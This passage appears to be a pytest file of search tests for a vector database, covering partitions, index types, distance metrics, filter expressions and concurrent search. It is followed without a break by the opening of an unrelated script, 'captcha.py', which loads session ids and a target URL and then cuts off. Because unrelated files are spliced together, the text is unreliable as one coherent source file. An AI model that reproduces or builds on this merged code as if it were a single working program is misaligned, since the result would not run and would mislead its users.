default_search_params, limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids[:entity_num],
"limit": limit-deleted_entity_num,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_partition_after_release_one(self, nq, dim, auto_id, _async):
"""
target: test search function before and after release
method: 1. search the collection
2. release a partition
3. search the collection
expected: the deleted entities should not be searched
"""
# 1. initialize with data
nb = 1000
limit = 1000
partition_num = 1
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
partition_num,
auto_id=auto_id,
dim=dim)
# 2. search all the partitions before partition deletion
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
log.info("test_search_partition_after_release_one: searching before deleting partitions")
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": limit,
"_async": _async})
# 3. release one partition
log.info("test_search_partition_after_release_one: releasing a partition")
par = collection_w.partitions
deleted_entity_num = par[partition_num].num_entities
entity_num = nb - deleted_entity_num
conn = self.connection_wrap.get_connection()[0]
conn.release_partitions(collection_w.name, [par[partition_num].name])
log.info("test_search_partition_after_release_one: released a partition")
# 4. search collection after release one partition
log.info("test_search_partition_after_release_one: searching after deleting partitions")
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids[:entity_num],
"limit": limit - deleted_entity_num,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_partition_after_release_all(self, nq, dim, auto_id, _async):
"""
target: test search function before and after release
method: 1. search the collection
2. release a partition
3. search the collection
expected: the deleted entities should not be searched
"""
# 1. initialize with data
nb = 1000
limit = 1000
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
1, auto_id=auto_id,
dim=dim)
# 2. search all the partitions before partition deletion
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
log.info("test_search_partition_after_release_all: searching before deleting partitions")
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": limit,
"_async": _async})
# 3. release all partitions
log.info("test_search_partition_after_release_all: releasing a partition")
par = collection_w.partitions
conn = self.connection_wrap.get_connection()[0]
conn.release_partitions(collection_w.name, [par[0].name, par[1].name])
log.info("test_search_partition_after_release_all: released a partition")
# 4. search collection after release all partitions
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": [],
"limit": 0,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_collection_after_release_load(self, nb, nq, dim, auto_id, _async):
"""
target: search the pre-released collection after load
method: 1. create collection
2. release collection
3. load collection
4. search the pre-released collection
expected: search successfully
"""
# 1. initialize without data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
1, auto_id=auto_id,
dim=dim)
# 2. release collection
collection_w.release()
# 3. Search the pre-released collection after load
collection_w.load()
log.info("test_search_collection_after_release_load: searching after load")
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
collection_w.search(vectors[:nq], default_search_field, default_search_params,
default_limit, default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="issue 6997")
def test_search_partition_after_release_load(self, nb, nq, dim, auto_id, _async):
"""
target: search the pre-released collection after load
method: 1. create collection
2. release a partition
3. load partition
4. search the pre-released partition
expected: search successfully
"""
# 1. initialize without data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
1, auto_id=auto_id,
dim=dim)
# 2. release collection
log.info("test_search_partition_after_release_load: releasing a partition")
par = collection_w.partitions
conn = self.connection_wrap.get_connection()[0]
conn.release_partitions(collection_w.name, [par[1].name])
log.info("test_search_partition_after_release_load: released a partition")
# 3. Search the collection after load
limit = 1000
collection_w.load()
log.info("test_search_partition_after_release_load: searching after load")
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
collection_w.search(vectors[:nq], default_search_field, default_search_params,
limit, default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": limit,
"_async": _async})
# 4. Search the pre-released partition after load
if limit > par[1].num_entities:
limit_check = par[1].num_entities
else:
limit_check = limit
collection_w.search(vectors[:nq], default_search_field, default_search_params,
limit, default_search_exp,
[par[1].name], _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids[par[0].num_entities:],
"limit": limit_check,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_load_flush_load(self, nb, nq, dim, auto_id, _async):
"""
target: test search when load before flush
method: 1. search the collection
2. insert data and load
3. flush, and load
expected: search success with limit(topK)
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, auto_id=auto_id, dim=dim)[0]
# 2. insert data
insert_ids = cf.insert_data(collection_w, nb, auto_id=auto_id, dim=dim)[3]
# 3. load data
collection_w.load()
# 4. flush and load
collection_w.num_entities
collection_w.load()
# 5. search for new data without load
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_new_data(self, nq, dim, auto_id, _async):
"""
target: test search new inserted data without load
method: 1. search the collection
2. insert new data
3. search the collection without load again
expected: new data should be searched
"""
# 1. initialize with data
limit = 1000
nb_old = 500
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb_old,
auto_id=auto_id,
dim=dim)
# 2. search for original data after load
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
log.info("test_search_new_data: searching for original data after load")
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": nb_old,
"_async": _async})
# 3. insert new data
nb_new = 300
insert_ids_new = cf.insert_data(collection_w, nb_new,
auto_id=auto_id, dim=dim)[3]
insert_ids.extend(insert_ids_new)
# gracefulTime is default as 1s which allows data
# could not be searched instantly in gracefulTime
time.sleep(gracefulTime)
# 4. search for new data without load
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": nb_old+nb_new,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_max_dim(self, nq, auto_id, _async):
"""
target: test search normal case
method: create connection, collection, insert and search
expected: search successfully with limit(topK)
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, default_nb,
auto_id=auto_id,
dim=max_dim)
# 2. search
log.info("test_search_max_dim: searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(max_dim)] for _ in range(nq)]
collection_w.search(vectors[:nq], default_search_field,
default_search_params, 2,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": 2,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("index, params",
zip(ct.all_index_types[:9],
ct.default_index_params[:9]))
def test_search_after_different_index_with_params(self, dim, index, params, auto_id, _async):
"""
target: test search with invalid search params
method: test search with invalid params type
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, 5000,
partition_num=1,
auto_id=auto_id,
dim=dim, is_index=True)
# 2. create index and load
if params.get("m"):
if (dim % params["m"]) != 0:
params["m"] = dim//4
if params.get("PQM"):
if (dim % params["PQM"]) != 0:
params["PQM"] = dim//4
default_index = {"index_type": index, "params": params, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
collection_w.load()
# 3. search
search_params = cf.gen_search_param(index)
vectors = [[random.random() for _ in range(dim)] for _ in range(default_nq)]
for search_param in search_params:
log.info("Searching with search params: {}".format(search_param))
collection_w.search(vectors[:default_nq], default_search_field,
search_param, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("index, params",
zip(ct.all_index_types[:9],
ct.default_index_params[:9]))
def test_search_after_index_different_metric_type(self, dim, index, params, auto_id, _async):
"""
target: test search with different metric type
method: test search with different metric type
expected: searched successfully
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, 5000,
partition_num=1,
auto_id=auto_id,
dim=dim, is_index=True)
# 2. create different index
if params.get("m"):
if (dim % params["m"]) != 0:
params["m"] = dim//4
if params.get("PQM"):
if (dim % params["PQM"]) != 0:
params["PQM"] = dim//4
log.info("test_search_after_index_different_metric_type: Creating index-%s" % index)
default_index = {"index_type": index, "params": params, "metric_type": "IP"}
collection_w.create_index("float_vector", default_index)
log.info("test_search_after_index_different_metric_type: Created index-%s" % index)
collection_w.load()
# 3. search
search_params = cf.gen_search_param(index, "IP")
vectors = [[random.random() for _ in range(dim)] for _ in range(default_nq)]
for search_param in search_params:
log.info("Searching with search params: {}".format(search_param))
collection_w.search(vectors[:default_nq], default_search_field,
search_param, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_collection_multiple_times(self, nb, nq, dim, auto_id, _async):
"""
target: test search for multiple times
method: search for multiple times
expected: searched successfully
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
auto_id=auto_id,
dim=dim)
# 2. search for multiple times
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
for i in range(search_num):
log.info("test_search_collection_multiple_times: searching round %d" % (i+1))
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_sync_async_multiple_times(self, nb, nq, dim, auto_id):
"""
target: test async search after sync search case
method: create connection, collection, insert,
sync search and async search
expected: search successfully with limit(topK)
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
auto_id=auto_id,
dim=dim)
# 2. search
log.info("test_search_sync_async_multiple_times: searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
for i in range(search_num):
log.info("test_search_sync_async_multiple_times: searching round %d" % (i + 1))
for _async in [False, True]:
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_multiple_vectors(self, nb, nq, dim, auto_id, _async):
"""
target: test search with multiple vectors
method: create connection, collection with multiple
vectors, insert and search
expected: search successfully with limit(topK)
"""
# 1. connect
self._connect()
# 2. create collection with multiple vectors
c_name = cf.gen_unique_str(prefix)
fields = [cf.gen_int64_field(is_primary=True), cf.gen_float_field(),
cf.gen_float_vec_field(dim=dim), cf.gen_float_vec_field(name="tmp", dim=dim)]
schema = cf.gen_collection_schema(fields=fields, auto_id=auto_id)
collection_w = self.collection_wrap.init_collection(c_name, schema=schema,
check_task=CheckTasks.check_collection_property,
check_items={"name": c_name, "schema": schema})[0]
# 3. insert
vectors = [[random.random() for _ in range(dim)] for _ in range(nb)]
vectors_tmp = [[random.random() for _ in range(dim)] for _ in range(nb)]
data = [[i for i in range(nb)], [np.float32(i) for i in range(nb)], vectors, vectors_tmp]
if auto_id:
data = [[np.float32(i) for i in range(nb)], vectors, vectors_tmp]
res = collection_w.insert(data)
insert_ids = res.primary_keys
assert collection_w.num_entities == nb
# 4. load
collection_w.load()
# 5. search all the vectors
log.info("test_search_multiple_vectors: searching collection %s" % collection_w.name)
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
collection_w.search(vectors[:nq], "tmp",
default_search_params, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L1)
def test_search_index_one_partition(self, nb, auto_id, _async):
"""
target: test search from partition
method: search from one partition
expected: searched successfully
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
partition_num=1,
auto_id=auto_id,
is_index=True)
# 2. create index
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
collection_w.load()
# 3. search in one partition
log.info("test_search_index_one_partition: searching (1000 entities) through one partition")
limit = 1000
par = collection_w.partitions
if limit > par[1].num_entities:
limit_check = par[1].num_entities
else:
limit_check = limit
search_params = {"metric_type": "L2", "params": {"nprobe": 128}}
collection_w.search(vectors[:default_nq], default_search_field,
search_params, limit, default_search_exp,
[par[1].name], _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids[par[0].num_entities:],
"limit": limit_check,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_index_partitions(self, nb, nq, dim, auto_id, _async):
"""
target: test search from partitions
method: search from partitions
expected: searched successfully
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
partition_num=1,
auto_id=auto_id,
dim=dim,
is_index=True)
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
# 2. create index
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
collection_w.load()
# 3. search through partitions
log.info("test_search_index_partitions: searching (1000 entities) through partitions")
par = collection_w.partitions
log.info("test_search_index_partitions: partitions: %s" % par)
limit = 1000
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit, default_search_exp,
[par[0].name, par[1].name], _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("partition_names",
[["(.*)"], ["search(.*)"]])
def test_search_index_partitions_fuzzy(self, nb, nq, dim, partition_names, auto_id, _async):
"""
target: test search from partitions
method: search from partitions with fuzzy
partition name
expected: searched successfully
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
partition_num=1,
auto_id=auto_id,
dim=dim)
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
# 2. create index
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
# 3. search through partitions
log.info("test_search_index_partitions_fuzzy: searching through partitions")
limit = 1000
limit_check = limit
par = collection_w.partitions
if partition_names == ["search(.*)"]:
insert_ids = insert_ids[par[0].num_entities:]
if limit > par[1].num_entities:
limit_check = par[1].num_entities
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit, default_search_exp,
partition_names, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": limit_check,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_index_partition_empty(self, nq, dim, auto_id, _async):
"""
target: test search the empty partition
method: search from the empty partition
expected: searched successfully with 0 results
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True, auto_id=auto_id,
dim=dim, is_index=True)[0]
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
# 2. create empty partition
partition_name = "search_partition_empty"
collection_w.create_partition(partition_name=partition_name, description="search partition empty")
par = collection_w.partitions
log.info("test_search_index_partition_empty: partitions: %s" % par)
collection_w.load()
# 3. create index
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
# 4. search the empty partition
log.info("test_search_index_partition_empty: searching %s "
"entities through empty partition" % default_limit)
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, [partition_name],
_async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": [],
"limit": 0,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_binary_jaccard_flat_index(self, nq, dim, auto_id, _async):
"""
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with JACCARD
expected: the return distance equals to the computed value
"""
# 1. initialize with binary data
collection_w, _, binary_raw_vector, insert_ids = self.init_collection_general(prefix, True, 2,
is_binary=True,
auto_id=auto_id,
dim=dim,
is_index=True)
# 2. create index
default_index = {"index_type": "BIN_IVF_FLAT", "params": {"nlist": 128}, "metric_type": "JACCARD"}
collection_w.create_index("binary_vector", default_index)
collection_w.load()
# 3. compute the distance
query_raw_vector, binary_vectors = cf.gen_binary_vectors(3000, dim)
distance_0 = cf.jaccard(query_raw_vector[0], binary_raw_vector[0])
distance_1 = cf.jaccard(query_raw_vector[0], binary_raw_vector[1])
# 4. search and compare the distance
search_params = {"metric_type": "JACCARD", "params": {"nprobe": 10}}
res = collection_w.search(binary_vectors[:nq], "binary_vector",
search_params, default_limit, "int64 >= 0",
_async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": 2,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert abs(res[0]._distances[0] - min(distance_0, distance_1)) <= epsilon
@pytest.mark.tags(CaseLabel.L2)
def test_search_binary_hamming_flat_index(self, nq, dim, auto_id, _async):
"""
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with HAMMING
expected: the return distance equals to the computed value
"""
# 1. initialize with binary data
collection_w, _, binary_raw_vector, insert_ids = self.init_collection_general(prefix, True, 2,
is_binary=True,
auto_id=auto_id,
dim=dim,
is_index=True)
# 2. create index
default_index = {"index_type": "BIN_IVF_FLAT", "params": {"nlist": 128}, "metric_type": "HAMMING"}
collection_w.create_index("binary_vector", default_index)
# 3. compute the distance
collection_w.load()
query_raw_vector, binary_vectors = cf.gen_binary_vectors(3000, dim)
distance_0 = cf.hamming(query_raw_vector[0], binary_raw_vector[0])
distance_1 = cf.hamming(query_raw_vector[0], binary_raw_vector[1])
# 4. search and compare the distance
search_params = {"metric_type": "HAMMING", "params": {"nprobe": 10}}
res = collection_w.search(binary_vectors[:nq], "binary_vector",
search_params, default_limit, "int64 >= 0",
_async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": 2,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert abs(res[0]._distances[0] - min(distance_0, distance_1)) <= epsilon
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="issue 6843")
def test_search_binary_tanimoto_flat_index(self, nq, dim, auto_id, _async):
"""
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with TANIMOTO
expected: the return distance equals to the computed value
"""
# 1. initialize with binary data
collection_w, _, binary_raw_vector, insert_ids = self.init_collection_general(prefix, True, 2,
is_binary=True,
auto_id=auto_id,
dim=dim,
is_index=True)
log.info("auto_id= %s, _async= %s" % (auto_id, _async))
# 2. create index
default_index = {"index_type": "BIN_IVF_FLAT", "params": {"nlist": 128}, "metric_type": "TANIMOTO"}
collection_w.create_index("binary_vector", default_index)
collection_w.load()
# 3. compute the distance
query_raw_vector, binary_vectors = cf.gen_binary_vectors(3000, dim)
distance_0 = cf.tanimoto(query_raw_vector[0], binary_raw_vector[0])
distance_1 = cf.tanimoto(query_raw_vector[0], binary_raw_vector[1])
# 4. search and compare the distance
search_params = {"metric_type": "TANIMOTO", "params": {"nprobe": 10}}
res = collection_w.search(binary_vectors[:nq], "binary_vector",
search_params, default_limit, "int64 >= 0",
_async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": 2,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert abs(res[0]._distances[0] - min(distance_0, distance_1)) <= epsilon
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("expression", cf.gen_normal_expressions())
def test_search_with_expression(self, dim, expression, _async):
"""
target: test search with different expressions
method: test search with different expressions
expected: searched successfully with correct limit(topK)
"""
# 1. initialize with data
nb = 1000
collection_w, _vectors, _, insert_ids = self.init_collection_general(prefix, True,
nb, dim=dim,
is_index=True)
# filter result with expression in collection
_vectors = _vectors[0]
expression = expression.replace("&&", "and").replace("||", "or")
filter_ids = []
for i, _id in enumerate(insert_ids):
int64 = _vectors.int64[i]
float = _vectors.float[i]
if not expression or eval(expression):
filter_ids.append(_id)
# 2. create index
index_param = {"index_type": "IVF_FLAT", "metric_type": "L2", "params": {"nlist": 100}}
collection_w.create_index("float_vector", index_param)
collection_w.load()
# 3. search with expression
log.info("test_search_with_expression: searching with expression: %s" % expression)
vectors = [[random.random() for _ in range(dim)] for _ in range(default_nq)]
search_res, _ = collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, nb, expression,
_async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": min(nb, len(filter_ids)),
"_async": _async})
if _async:
search_res.done()
search_res = search_res.result()
filter_ids_set = set(filter_ids)
for hits in search_res:
ids = hits.ids
assert set(ids).issubset(filter_ids_set)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("expression", cf.gen_normal_expressions_field(default_float_field_name))
def test_search_with_expression_auto_id(self, dim, expression, _async):
"""
target: test search with different expressions
method: test search with different expressions
expected: searched successfully with correct limit(topK)
"""
# 1. initialize with data
nb = 1000
collection_w, _vectors, _, insert_ids = self.init_collection_general(prefix, True, nb,
auto_id=True,
dim=dim,
is_index=True)
# filter result with expression in collection
_vectors = _vectors[0]
expression = expression.replace("&&", "and").replace("||", "or")
filter_ids = []
for i, _id in enumerate(insert_ids):
exec(f"{default_float_field_name} = _vectors.{default_float_field_name}[i]")
if not expression or eval(expression):
filter_ids.append(_id)
# 2. create index
index_param = {"index_type": "IVF_FLAT", "metric_type": "L2", "params": {"nlist": 100}}
collection_w.create_index("float_vector", index_param)
collection_w.load()
# 3. search with different expressions
log.info("test_search_with_expression: searching with expression: %s" % expression)
vectors = [[random.random() for _ in range(dim)] for _ in range(default_nq)]
search_res, _ = collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, nb, expression,
_async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": min(nb, len(filter_ids)),
"_async": _async})
if _async:
search_res.done()
search_res = search_res.result()
filter_ids_set = set(filter_ids)
for hits in search_res:
ids = hits.ids
assert set(ids).issubset(filter_ids_set)
@pytest.mark.tags(CaseLabel.L2)
def test_search_expression_all_data_type(self, nb, nq, dim, auto_id, _async):
"""
target: test search using different supported data type
method: search using different supported data type
expected: search success
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
is_all_data_type=True,
auto_id=auto_id,
dim=dim)
# 2. search
log.info("test_search_expression_all_data_type: Searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
search_exp = "int64 >= 0 && int32 >= 0 && int16 >= 0 " \
"&& int8 >= 0 && float >= 0 && double >= 0"
res = collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
search_exp, _async=_async,
output_fields=[default_int64_field_name,
default_float_field_name],
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert len(res[0][0].entity._row_data) != 0
assert (default_int64_field_name and default_float_field_name) in res[0][0].entity._row_data
@pytest.mark.tags(CaseLabel.L2)
def test_search_with_output_fields_empty(self, nb, nq, dim, auto_id, _async):
"""
target: test search with output fields
method: search with empty output_field
expected: search success
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
auto_id=auto_id,
dim=dim)
# 2. search
log.info("test_search_with_output_fields_empty: Searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
res = collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
output_fields=[],
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert len(res[0][0].entity._row_data) == 0
@pytest.mark.tags(CaseLabel.L1)
def test_search_with_output_field(self, auto_id, _async):
"""
target: test search with output fields
method: search with one output_field
expected: search success
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True,
auto_id=auto_id)
# 2. search
log.info("test_search_with_output_field: Searching collection %s" % collection_w.name)
res = collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
output_fields=[default_int64_field_name],
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert len(res[0][0].entity._row_data) != 0
assert default_int64_field_name in res[0][0].entity._row_data
@pytest.mark.tags(CaseLabel.L2)
def test_search_with_output_fields(self, nb, nq, dim, auto_id, _async):
"""
target: test search with output fields
method: search with multiple output_field
expected: search success
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
is_all_data_type=True,
auto_id=auto_id,
dim=dim)
# 2. search
log.info("test_search_with_output_fields: Searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
res = collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
output_fields=[default_int64_field_name,
default_float_field_name],
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert len(res[0][0].entity._row_data) != 0
assert (default_int64_field_name and default_float_field_name) in res[0][0].entity._row_data
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("output_fields", [["*"], ["*", default_float_field_name]])
def test_search_with_output_field_wildcard(self, output_fields, auto_id, _async):
"""
target: test search with output fields using wildcard
method: search with one output_field (wildcard)
expected: search success
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True,
auto_id=auto_id)
# 2. search
log.info("test_search_with_output_field_wildcard: Searching collection %s" % collection_w.name)
res = collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
output_fields=output_fields,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert len(res[0][0].entity._row_data) != 0
assert (default_int64_field_name and default_float_field_name) in res[0][0].entity._row_data
@pytest.mark.tags(CaseLabel.L2)
def test_search_multi_collections(self, nb, nq, dim, auto_id, _async):
"""
target: test search multi collections of L2
method: add vectors into 10 collections, and search
expected: search status ok, the length of result
"""
self._connect()
collection_num = 10
for i in range(collection_num):
# 1. initialize with data
log.info("test_search_multi_collections: search round %d" % (i + 1))
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
auto_id=auto_id,
dim=dim)
# 2. search
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
log.info("test_search_multi_collections: searching %s entities (nq = %s) from collection %s" %
(default_limit, nq, collection_w.name))
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_concurrent_multi_threads(self, nb, nq, dim, auto_id, _async):
"""
target: test concurrent search with multi-processes
method: search with 10 processes, each process uses dependent connection
expected: status ok and the returned vectors should be query_records
"""
# 1. initialize with data
threads_num = 10
threads = []
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
auto_id=auto_id,
dim=dim)
def search(collection_w):
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
# 2. search with multi-processes
log.info("test_search_concurrent_multi_threads: searching with %s processes" % threads_num)
for i in range(threads_num):
t = threading.Thread(target=search, args=(collection_w,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
|
captcha.py
|
# !/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2021/10/27 10:28 下午
# @Author : Destiny_
# @File : captcha.py
import re
import json
import time
import encrypt
import pymysql
import requests
import schedule
import threading
captcha_map = {}
sid_list = encrypt.sid_list
aim_url = encrypt.aim_url
kdt_id = re.findall(r'kdt_id=(\d+?)&', aim_url)[0]
def header(sid):
headers = {
'content-type': 'application/json',
